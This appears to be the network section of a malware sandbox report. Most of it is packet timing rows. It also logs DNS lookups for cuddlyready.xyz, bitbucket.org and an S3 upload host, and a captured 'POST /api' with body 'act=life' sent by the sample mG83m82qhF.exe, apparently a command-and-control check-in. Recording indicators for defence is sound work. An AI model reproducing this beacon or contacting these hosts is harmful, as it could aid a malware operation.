                                                                                                                                                                              Dec 23, 2024 08:31:51.883687973 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.889889002 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.889933109 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.889978886 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.889988899 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.890019894 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.896269083 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.896321058 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.896332979 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.896342993 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.896378040 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.940028906 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:51.940057993 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:51.986927032 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.205121994 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205138922 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205197096 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205235958 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205260992 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.205264091 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205302954 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.205317974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.205317974 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.252621889 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.317799091 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317811966 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317869902 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317893028 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317909002 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317930937 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.317969084 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.317981958 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.318689108 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.318718910 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.318727970 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.318744898 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.318751097 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.318767071 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.318778038 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.318794966 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.320384979 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.320422888 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.320453882 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.320461035 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.320488930 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.321873903 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321913958 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321950912 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321952105 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.321963072 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.321980953 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.322000980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323692083 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323712111 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323738098 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323821068 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.323831081 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324636936 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324659109 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324696064 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.324702978 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.324733019 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.326086998 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.326103926 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.326138973 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.326145887 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.326170921 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.327754974 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327776909 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327807903 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.327815056 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327836037 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.329540968 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.329557896 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.329612970 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.329621077 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331059933 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331127882 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331161022 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.331172943 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331196070 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.331955910 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331974030 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.332025051 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.332035065 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333682060 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333720922 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333746910 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.333758116 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333769083 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.333806038 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.335344076 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335365057 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335400105 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335405111 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.335412025 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335448980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336177111 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336858988 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336875916 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336904049 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336926937 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336934090 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336951971 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336967945 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.431026936 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431058884 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431094885 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431111097 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.431144953 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431160927 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.437383890 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437412024 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437452078 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.437464952 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437484980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.443681002 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443701982 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443747997 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.443767071 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443785906 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.449953079 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450015068 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450032949 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.450046062 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450067043 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.456195116 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456240892 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456276894 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.456285000 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456307888 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.462225914 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462282896 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462318897 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462332964 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.462342024 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462379932 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.467798948 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467820883 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467904091 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.467916965 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467955112 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.468302965 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473109961 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473131895 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473169088 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.473187923 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473208904 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.518140078 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.518162012 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.565001011 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.582283020 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.600168943 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.625947952 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.625963926 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626015902 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626040936 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.626055956 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626075983 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626089096 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.626096964 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.631360054 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.631392956 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.631417036 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.631431103 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.631452084 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.636889935 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.636948109 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.636974096 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.636987925 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.637006044 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.637020111 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.637042999 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.642554045 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.642587900 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.642625093 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.642637014 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.642652035 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.642677069 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.643172979 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.648108006 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.648130894 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.648170948 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.648189068 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.648209095 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.653564930 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.653593063 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.653620958 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.653640985 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.653656960 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.659073114 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.659130096 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.659142017 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.659163952 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.659182072 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.659203053 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.815433025 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.815471888 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.815509081 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.815512896 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.815550089 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.815577984 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.815587997 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.820810080 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.820841074 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.820871115 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.820905924 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.820924997 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.826272011 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.826347113 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.826361895 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.826387882 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.826405048 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.826426983 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.829415083 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.829457998 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.829503059 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.829514027 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.829540014 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.878581047 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.923329115 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:53.389456987 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:53.389497995 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:53.389538050 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:53.389544964 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 23, 2024 08:31:22.992674112 CET5542053192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:31:23.129875898 CET53554201.1.1.1192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:46.073316097 CET4993453192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:31:46.209882021 CET53499341.1.1.1192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:48.320728064 CET5622453192.168.2.101.1.1.1
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET53562241.1.1.1192.168.2.10
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 23, 2024 08:31:22.992674112 CET192.168.2.101.1.1.10x4343Standard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:46.073316097 CET192.168.2.101.1.1.10x2f3Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.320728064 CET192.168.2.101.1.1.10x3e65Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 23, 2024 08:31:23.129875898 CET1.1.1.1192.168.2.100x4343No error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:23.129875898 CET1.1.1.1192.168.2.100x4343No error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:46.209882021 CET1.1.1.1192.168.2.100x2f3No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:46.209882021 CET1.1.1.1192.168.2.100x2f3No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:46.209882021 CET1.1.1.1192.168.2.100x2f3No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com52.217.136.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com52.217.160.161A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com3.5.25.111A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com16.15.194.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com3.5.25.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com16.182.74.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com54.231.230.105A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 23, 2024 08:31:48.631115913 CET1.1.1.1192.168.2.100x3e65No error (0)s3-w.us-east-1.amazonaws.com52.217.49.228A (IP address)IN (0x0001)false
                                                                                                                                                                              • cuddlyready.xyz
                                                                                                                                                                              • bitbucket.org
                                                                                                                                                                              • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.1049709172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:24 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                              2024-12-23 07:31:25 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=u9nkdp42olf2ckpu2o6q5fgobt; expires=Fri, 18 Apr 2025 01:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvjr6%2BV5hNemXd0ASOXUGuRvSogQ1HVHzJXaWvrnSRjb0jtoHOqKSSvguzrxC3CTmJ2Sfq2oNxZZbRsehETrz96P%2F8jrFiezQJfSDFNyKJD3g62FZX7mHxncXDePTLXMLXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6deefabc3ff-EWR
